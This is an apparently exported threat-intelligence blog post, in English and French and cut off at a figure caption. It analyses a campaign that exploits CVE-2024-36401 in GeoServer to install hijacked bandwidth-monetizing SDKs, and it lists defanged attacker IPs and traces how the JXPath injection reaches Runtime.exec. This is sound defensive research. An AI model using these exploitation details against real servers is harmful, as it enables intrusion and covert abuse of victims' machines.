{"id":156324,"date":"2025-08-21T07:53:32","date_gmt":"2025-08-21T14:53:32","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=156324"},"modified":"2025-09-10T08:37:33","modified_gmt":"2025-09-10T15:37:33","slug":"attackers-sell-your-bandwidth-using-sdks","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","title":{"rendered":"Your Connection, Their Profits: Threat Actors Hijack SDKs to Monetize Your Bandwidth"},"content":{"rendered":"<h2><a id=\"post-156324-_heading=h.yom2667ow25x\"><\/a>Executive Summary<\/h2>\n<p>We detected a campaign aimed at taking control of victims' machines and monetizing access to their bandwidth. It relies on exploiting <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-36401\" target=\"_blank\" rel=\"noopener\">CVE-2024-36401<\/a>, a vulnerability affecting GeoServer, a geospatial database. This remote code execution flaw, rated critical, has a <a href=\"https:\/\/nvd.nist.gov\/vuln-metrics\/cvss\" target=\"_blank\" rel=\"noopener\">CVSS score<\/a> of 9.8.<\/p>\n<p>Cybercriminals use it to deploy legitimate software development kits (SDKs) or modified applications that let them generate passive income through network sharing or residential proxy services.<\/p>\n<p>This method of generating passive income is particularly stealthy. It mirrors a monetization strategy adopted by some application developers who prefer SDKs to traditional advertising. 
A practice that is sometimes well intentioned, meant to preserve the user experience and improve retention.<\/p>\n<p>The applications we identified in this malicious activity run almost silently. They consume very few resources while monetizing the victims' internet bandwidth, without creating or distributing malware. This integration lets application developers collect payments, while the criminals profit from idle server resources, which helps them evade detection.<\/p>\n<p>Since March 2025, attackers have been probing GeoServer instances exposed to the internet. <a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xpanse\" target=\"_blank\" rel=\"noopener\">Cortex Xpanse<\/a> counted 3,706 publicly accessible GeoServer instances during the first week of May 2025, revealing a potentially large attack surface for adversaries exploiting CVE-2024-36401.<\/p>\n<p>Palo Alto Networks customers are better protected against the threats discussed in this article through the following products and services:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-threat-prevention\" target=\"_blank\" rel=\"noopener\">Advanced Threat Prevention<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> and <a 
href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced DNS Security<\/a><\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/cortex\/cortex-xdr?_gl=1*13pmp8e*_ga*NzQyNjM2NzkuMTY2NjY3OTczNw..*_ga_KS2MELEEFC*MTY2OTczNjA2MS4zMS4wLjE2Njk3MzYwNjEuNjAuMC4w\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> and <a href=\"https:\/\/paloaltonetworks.com\/cortex\/cortex-xsiam\" target=\"_blank\" rel=\"noopener\">XSIAM<\/a><\/li>\n<\/ul>\n<p>If you think your organization may have been compromised or you have an urgent matter, contact the <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">Unit 42 Incident Response team<\/a>.<\/p>\n<table style=\"width: 98.107%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>Related Unit 42 Topics<\/b><\/td>\n<td style=\"width: 205.282%;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/category\/vulnerabilities-fr\/\" target=\"_blank\" rel=\"noopener\"><b>Vulnerabilities<\/b><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-156324-_heading=h.wio1hd66g08g\"><\/a>Dissecting the Campaign<\/h2>\n<p>We closely tracked a campaign that emerged in early March 2025. 
The attackers modified both their infrastructure and their tactics, techniques and procedures (TTPs) to establish a foothold.<\/p>\n<p>Our analysis revealed that the attackers hijacked both an SDK and an application:<\/p>\n<ul>\n<li>The SDK allowed developers to monetize other applications by collecting user data to generate passive income.<\/li>\n<li>The application offered users a way to earn passive income by sharing their internet connection.<\/li>\n<\/ul>\n<p>The following timeline illustrates how this threat evolved.<\/p>\n<h3><a id=\"post-156324-_heading=h.emjqw1lrdf4h\"><\/a><strong>Phase 1: Initial Intrusion (early March 2025)<\/strong><\/h3>\n<p>The campaign began with exploitation attempts targeting CVE-2024-36401, followed by deployment of the hijacked application and of payloads associated with the hijacked SDK.<\/p>\n<ul>\n<li>March 8, 2025: the campaign started with exploitation attempts from the source IP address <span style=\"font-family: 'courier new', courier, monospace;\">108.251.152[.]209<\/span>. 
The attacker used an exploit specifically targeting CVE-2024-36401.<\/li>\n<li>Distribution of custom executables: we observed that these early exploitation attempts retrieved custom executables hosted at <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span>.<\/li>\n<li>Two main executables were distributed from this host:\n<ul>\n<li>The hijacked application: we detected several variants, including three we designated with the identifiers <span style=\"font-family: 'courier new', courier, monospace;\">a193, d193<\/span> and <span style=\"font-family: 'courier new', courier, monospace;\">e193<\/span>.<\/li>\n<li>The hijacked SDK: we identified several variants, including five we designated with the identifiers <span style=\"font-family: 'courier new', courier, monospace;\">a593, c593, d593, s593<\/span> and <span style=\"font-family: 'courier new', courier, monospace;\">z593<\/span>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.wzsm9tbli2s3\"><\/a><strong>Phase 2: Tactical Evolution (late March to early April 2025)<\/strong><\/h3>\n<p>During this phase, the attackers changed tactics.<\/p>\n<ul>\n<li>March 24, 2025: a few vendors on VirusTotal flagged the distribution IP address <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span> as malicious. This shift indicates that the security community had begun to identify malicious activity originating from this address. 
We believe this factor played a decisive role in the attackers' decision to move their infrastructure to a new IP address.<\/li>\n<li>March 26, 2025: the attackers appear to have stopped distributing new samples of the hijacked application. Their attention apparently shifted exclusively to the hijacked SDK.<\/li>\n<li>April 1, 2025: the threat actors switched their primary exploit delivery infrastructure to a new source IP address, <span style=\"font-family: 'courier new', courier, monospace;\">185.246.84[.]189<\/span>. This move was likely intended to evade blocklists and continue their operations unhindered.<\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.aaz3kv8409w4\"><\/a><strong>Phase 3: Infrastructure Expansion and Persistence (mid-April 2025 to present)<\/strong><\/h3>\n<p>The attackers expanded their infrastructure during this phase of the campaign.<\/p>\n<ul>\n<li>April 17, 2025: they broadened their backend infrastructure by bringing online a new IP address for distributing custom executables, <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/li>\n<li>The original distribution IP address, <span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span>, was still active as of mid-June.<\/li>\n<\/ul>\n<p>At the time of writing, exploitation attempts continue from <span style=\"font-family: 'courier new', courier, monospace;\">185.246.84[.]189<\/span>, and the custom executable distribution servers remain operational.<\/p>\n<h2><a 
id=\"post-156324-_heading=h.4a4qj1lx2ve\"><\/a>Analysis of CVE-2024-36401 Exploitation<\/h2>\n<p>The core of this vulnerability lies in an attacker's ability to inject arbitrary code into JXPath query statements. JXPath is an Apache Commons library that provides an implementation of XPath.<\/p>\n<p>XPath is a widely adopted standard for querying and transforming XML documents. JXPath transparently extends the use of XPath expressions to various Java data structures beyond XML, notably JavaBeans and several collection types. From a security standpoint, this added flexibility also raises significant concerns.<\/p>\n<p>JXPath supports <a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/index.html#extension-functions-heading\" target=\"_blank\" rel=\"noopener\">extension functions<\/a>, which an attacker can abuse if they manage to control the query statement, allowing them to execute arbitrary code. 
This makes it a higher risk than classic query injection vulnerabilities.<\/p>\n<p>For example, the attackers used the standard extension functions to invoke methods such as <span style=\"font-family: 'courier new', courier, monospace;\"><em>getRuntime().exec()<\/em><\/span>.<\/p>\n<p>Figure 1 shows an example of malicious code that abuses JXPath's ability to evaluate expressions, allowing an attacker to inject and execute arbitrary system commands through the <span style=\"font-family: 'courier new', courier, monospace;\">#{cmd}<\/span> placeholder. By calling <span style=\"font-family: 'courier new', courier, monospace;\">exec(java.lang.Runtime.getRuntime())<\/span> inside <span style=\"font-family: 'courier new', courier, monospace;\">context.getValue<\/span>, the attacker triggers the Java runtime's execution mechanism, resulting in remote code execution on the target system.<\/p>\n<figure id=\"attachment_156325\" aria-describedby=\"caption-attachment-156325\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156325 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1.png\" alt=\"A line of code displayed on a dark background shows a command injection vulnerability using Java Runtime to execute an unwanted command.\" width=\"1000\" height=\"134\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1.png 1164w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1-786x105.png 786w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-33505-156324-1-768x103.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156325\" class=\"wp-caption-text\">Figure 1. Malicious code containing a JXPath reference to a Java execution function.<\/figcaption><\/figure>\n<p>Figure 2 shows the payload from this attack, of which we have reproduced the key portion. The redacted part forces the victim to run a system command that downloads a file from the attacker-controlled distribution IP addresses.<\/p>\n<figure id=\"attachment_156336\" aria-describedby=\"caption-attachment-156336\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156336 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2.png\" alt=\"Screenshot of a code snippet including tags such as GetPropertyValue and ValueReference. The background is black with green text. Some information has been redacted.\" width=\"1000\" height=\"245\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2.png 1812w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-786x193.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-768x188.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-36148-156324-2-1536x376.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156336\" class=\"wp-caption-text\">Figure 2. 
Exploit payload observed in the wild.<\/figcaption><\/figure>\n<p>According to the <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-36401\" target=\"_blank\" rel=\"noopener\">NVD<\/a>:<\/p>\n<p style=\"padding-left: 40px;\"><em>This vulnerability has been confirmed to be exploitable through various types of Web Feature Service (WFS), Web Map Service (WMS) and Web Processing Service (WPS) requests, notably GetFeature, GetPropertyValue, GetMap, GetFeatureInfo, GetLegendGraphic and Execute.<\/em><\/p>\n<p>While analyzing an exploit used in this attack, we set up a GeoServer instance and applied a payload observed in the wild to study how it works. Following GeoServer's code flow allowed us to observe what happens internally.<\/p>\n<p>After simulating the submission of an attack payload, our command was passed to the <span style=\"font-family: 'courier new', courier, monospace;\"><em>GetPropertyValue<\/em><\/span> function. As Figure 3 illustrates, the highlighted line takes the incoming <span style=\"font-family: 'courier new', courier, monospace;\"><em>request<\/em><\/span> object and passes it to a <span style=\"font-family: 'courier new', courier, monospace;\"><em>run<\/em><\/span> method. 
The command is then carried in <span style=\"font-family: 'courier new', courier, monospace;\"><em>request.valueReference<\/em><\/span>.<\/p>\n<figure id=\"attachment_156347\" aria-describedby=\"caption-attachment-156347\" style=\"width: 917px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156347 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3.png\" alt=\"Screenshot of code in an IDE, including a method definition in a class marked as overriding a method of an implemented service. The code is highlighted with red and blue syntax coloring.\" width=\"917\" height=\"287\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3.png 917w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3-786x246.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-38900-156324-3-768x240.png 768w\" sizes=\"(max-width: 917px) 100vw, 917px\" \/><figcaption id=\"caption-attachment-156347\" class=\"wp-caption-text\">Figure 3. Entry point of a malicious payload.<\/figcaption><\/figure>\n<p>Stepping into this function, we see that the payload from Figure 2 has been passed to the <span style=\"font-family: 'courier new', courier, monospace;\"><em>propertyNameNoIndexes<\/em><\/span> object, as the code in Figure 4 shows. 
This object then calls the <span style=\"font-family: 'courier new', courier, monospace;\"><em>evaluate<\/em><\/span> method of <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools<\/span>.<\/p>\n<figure id=\"attachment_156358\" aria-describedby=\"caption-attachment-156358\" style=\"width: 985px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156358 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4.png\" alt=\"Screenshot of syntax-highlighted code in an IDE, showing methods and exception handling related to attribute properties. The image shows several lines of code with comments and error indicators.\" width=\"985\" height=\"264\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4.png 985w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4-786x211.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-41547-156324-4-768x206.png 768w\" sizes=\"(max-width: 985px) 100vw, 985px\" \/><figcaption id=\"caption-attachment-156358\" class=\"wp-caption-text\">Figure 4. The malicious payload is passed to an insecure <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools<\/span> method.<\/figcaption><\/figure>\n<p>We are now in the <a href=\"https:\/\/geotools.org\/\" target=\"_blank\" rel=\"noopener\">GeoTools<\/a> source code. The <em><span style=\"font-family: 'courier new', courier, monospace;\">evaluate<\/span><\/em> method retrieves the value of the <span style=\"font-family: 'courier new', courier, monospace;\">GeoTools<\/span> attribute from the supplied object. 
Within this method, a <span style=\"font-family: 'courier new', courier, monospace;\"><em>PropertyAccessor<\/em><\/span> object is used to read the property. Figure 5 shows that <span style=\"font-family: 'courier new', courier, monospace;\"><em>PropertyAccessor<\/em><\/span> is a central interface that defines the operations for reading and writing an object's property values. GeoTools tries to find an <em><span style=\"font-family: 'courier new', courier, monospace;\">accessor<\/span><\/em> based on the supplied parameters.<\/p>\n<figure id=\"attachment_156369\" aria-describedby=\"caption-attachment-156369\" style=\"width: 834px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156369 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5.png\" alt=\"Screenshot of code in an IDE, including several methods and if-else conditional statements, shown with line numbers and syntax highlighting. The PropertyAccessors line is highlighted.\" width=\"834\" height=\"353\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5.png 834w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5-786x333.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-44160-156324-5-768x325.png 768w\" sizes=\"(max-width: 834px) 100vw, 834px\" \/><figcaption id=\"caption-attachment-156369\" class=\"wp-caption-text\">Figure 5. 
The malicious payload is passed to the <span style=\"font-family: 'courier new', courier, monospace;\">findPropertyAccessors<\/span> method of the <span style=\"font-family: 'courier new', courier, monospace;\">PropertyAccessor<\/span> object.<\/figcaption><\/figure>\n<p>Once the <em><span style=\"font-family: 'courier new', courier, monospace;\">accessor<\/span><\/em> is identified, it uses the object's <span style=\"font-family: 'courier new', courier, monospace;\">get<\/span> method to retrieve the property value. Figure 6 shows that our payload was passed to this method via the <span style=\"font-family: 'courier new', courier, monospace;\"><em>attPath<\/em><\/span> parameter.<\/p>\n<figure id=\"attachment_156380\" aria-describedby=\"caption-attachment-156380\" style=\"width: 845px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156380 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6.png\" alt=\"Screenshot of a computer display showing code in an IDE, including functions and properties written in a programming language, focused on a method named getAttributeExpression.\" width=\"845\" height=\"481\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6.png 845w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6-773x440.png 773w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-46837-156324-6-768x437.png 768w\" sizes=\"(max-width: 845px) 100vw, 845px\" \/><figcaption id=\"caption-attachment-156380\" class=\"wp-caption-text\">Figure 6. 
A malicious payload is passed to <span style=\"font-family: 'courier new', courier, monospace;\">attPath<\/span>.<\/figcaption><\/figure>\n<p>The object's <span style=\"font-family: 'courier new', courier, monospace;\">get<\/span> method calls the <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/org\/apache\/commons\/jxpath\/ri\/JXPathContextReferenceImpl.html#iteratePointers(java.lang.String)\" target=\"_blank\" rel=\"noopener\"><em>iteratePointers<\/em><\/a><\/span> function of the JXPath library. As Figure 7 shows, a payload is injected into the <span style=\"font-family: 'courier new', courier, monospace;\"><em>xpath<\/em><\/span> variable, which is then passed to the <span style=\"font-family: 'courier new', courier, monospace;\"><em>context.iteratePointers<\/em><\/span> method.<\/p>\n<figure id=\"attachment_156391\" aria-describedby=\"caption-attachment-156391\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156391 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7.png\" alt=\"Screenshot of code in an integrated development environment (IDE), relating to HTTP requests and error handling.\" width=\"1000\" height=\"216\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7.png 1414w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7-786x170.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-49618-156324-7-768x166.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156391\" class=\"wp-caption-text\">Figure 7. 
The <span style=\"font-family: 'courier new', courier, monospace;\">iteratePointers<\/span> function of JXPath.<\/figcaption><\/figure>\n<p>The <span style=\"font-family: 'courier new', courier, monospace;\"><em>ExtensionFunction<\/em><\/span> has been manipulated and uses <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/apidocs\/org\/apache\/commons\/jxpath\/ri\/JXPathContextReferenceImpl.html#iteratePointers(java.lang.String)\" target=\"_blank\" rel=\"noopener\"><em>computeValue<\/em><\/a><\/span> to evaluate the expression. As Figure 8 illustrates, the <em>function<\/em> variable now points directly to <span style=\"font-family: 'courier new', courier, monospace;\"><em>java.lang.Runtime.exec<\/em><\/span>, Java's standard method for executing operating system commands. The parameters passed to this function include the attacker's command, and the highlighted line executes that command.<\/p>\n<figure id=\"attachment_156402\" aria-describedby=\"caption-attachment-156402\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156402 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8.png\" alt=\"Screenshot of a coding interface in an IDE showing HTML and JavaScript code.\" width=\"1000\" height=\"95\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8.png 1593w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-786x75.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-768x73.png 768w, 
https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-52291-156324-8-1536x147.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156402\" class=\"wp-caption-text\">Figure 8. Execution of malicious code.<\/figcaption><\/figure>\n<h2><a id=\"post-156324-_heading=h.33lb3prhorwd\"><\/a>Exposed Vulnerable Servers<\/h2>\n<p>Cortex Xpanse telemetry collected in March and April 2025 revealed 7,126 publicly exposed GeoServer instances across 99 countries. The five countries hosting the most instances are shown in Figure 9. The majority of exposed servers are located in China.<\/p>\n<figure id=\"attachment_152674\" aria-describedby=\"caption-attachment-152674\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-152674 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7.png\" alt=\"Bar chart showing the distribution of exposed GeoServer instances across the top five countries. 
China has the highest count (over 2,500), followed by the United States, Germany, the United Kingdom and Singapore with markedly lower volumes.\" width=\"1000\" height=\"619\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-711x440.png 711w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-1131x700.png 1131w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-768x475.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/chart-7-1536x950.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-152674\" class=\"wp-caption-text\">Figure 9. Distribution of exposed GeoServer instances across the five countries where they are most often hosted.<\/figcaption><\/figure>\n<h2><a id=\"post-156324-_heading=h.nio06wkna6km\"><\/a>Attack Chain Analysis<\/h2>\n<p>We identified several distinct exploitation strategies in this campaign. All of them aim to deploy and run an SDK on the victim's system. This analysis focuses on an SDK variant we named “<span style=\"font-family: 'courier new', courier, monospace;\">z593<\/span>”. 
Figure 10 illustrates the first stage: exploiting CVE-2024-36401 to download the malicious payload (z593) from an attacker-controlled host.<\/p>\n<figure id=\"attachment_156424\" aria-describedby=\"caption-attachment-156424\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156424 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10.png\" alt=\"Image showing a code snippet in XML format, related to WFS and including references to Java Runtime executables and system paths. The code area background is dark, with text highlighted in green, red, yellow and white.\" width=\"1000\" height=\"218\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10.png 2048w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-786x171.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-1920x418.png 1920w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-768x167.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-59110-156324-10-1536x335.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156424\" class=\"wp-caption-text\">Figure 10. 
\u00c9tape 1 : exploitation initiale permettant de t\u00e9l\u00e9charger le payload de la deuxi\u00e8me \u00e9tape.<\/figcaption><\/figure>\n<p>Au cours de la deuxi\u00e8me \u00e9tape, l\u2019attaquant exploite \u00e0 nouveau la vuln\u00e9rabilit\u00e9\u00a0CVE-2024-36401 afin d\u2019ex\u00e9cuter le payload t\u00e9l\u00e9charg\u00e9 lors de la premi\u00e8re \u00e9tape (<span style=\"font-family: 'courier new', courier, monospace;\">z593<\/span>), comme le montre la Figure\u00a011.<\/p>\n<figure id=\"attachment_156435\" aria-describedby=\"caption-attachment-156435\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156435 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11.png\" alt=\"Capture d\u2019\u00e9cran affichant du code\u00a0XML li\u00e9 \u00e0 un WFS, avec des URL d\u2019espace de noms et une requ\u00eate utilisant un environnement Java\u00a0Runtime.\" width=\"1000\" height=\"243\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11.png 1678w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-786x191.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-768x187.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-62087-156324-11-1536x373.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156435\" class=\"wp-caption-text\">Figure 11. 
\u00c9tape 2 : exploitation permettant d\u2019ex\u00e9cuter le payload de la deuxi\u00e8me \u00e9tape.<\/figcaption><\/figure>\n<p>Plut\u00f4t que d\u2019utiliser un serveur web\u00a0HTTP standard, les attaquants ont d\u00e9ploy\u00e9 des instances priv\u00e9es d\u2019un serveur de partage de fichiers bas\u00e9 sur <a href=\"https:\/\/github.com\/dutchcoders\/transfer.sh?tab=readme-ov-file#transfersh---\" target=\"_blank\" rel=\"noopener\">transfer.sh<\/a> afin de distribuer leurs payloads. L\u2019instance de transfer.sh est h\u00e9berg\u00e9e sur l\u2019une des adresses\u00a0IP de distribution contr\u00f4l\u00e9es par les attaquants (cf. Figure\u00a012).<\/p>\n<p><figure id=\"attachment_156446\" aria-describedby=\"caption-attachment-156446\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156446 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un site web intitul\u00e9 \u00ab\u00a0Easy file sharing from the command line\u00a0\u00bb, affichant des exemples de commandes d\u2019upload de fichiers et une zone de glisser-d\u00e9poser, avec un bouton \u00ab\u00a0Learn more\u00a0\u00bb en bas. Une adresse\u00a0IP appara\u00eet en haut \u00e0 gauche. \" width=\"1000\" height=\"496\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12.png 1427w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-786x390.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-1411x700.png 1411w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-64987-156324-12-768x381.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156446\" class=\"wp-caption-text\">Figure 12. 
Page d\u2019index d\u2019un serveur transfer.sh h\u00e9berg\u00e9 sur<span style=\"font-family: 'courier new', courier, monospace;\"> 64.226.112[.]52:8080<\/span> par les attaquants.<\/figcaption><\/figure>Les d\u00e9ploiements d\u00e9crits dans la Figure\u00a012 \u00e9taient actifs sur le port\u00a08080 et r\u00e9partis sur deux adresses\u00a0IP contr\u00f4l\u00e9es par les attaquants\u00a0:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75<\/span><\/li>\n<\/ul>\n<p>Si l\u2019exploitation initiale aboutit, le script agit alors comme un \u00ab\u00a0stager\u00a0\u00bb. Deux autres fichiers sont alors t\u00e9l\u00e9charg\u00e9s, comme l\u2019illustre la Figure\u00a013.<\/p>\n<p><figure id=\"attachment_156457\" aria-describedby=\"caption-attachment-156457\" style=\"width: 635px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156457 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-67951-156324-13.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un terminal affichant des commandes pour t\u00e9l\u00e9charger des fichiers avec wget depuis des adresses\u00a0IP sp\u00e9cifiques.\" width=\"635\" height=\"97\" \/><figcaption id=\"caption-attachment-156457\" class=\"wp-caption-text\">Figure 13. Contenu du fichier z593 depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span> menant \u00e0 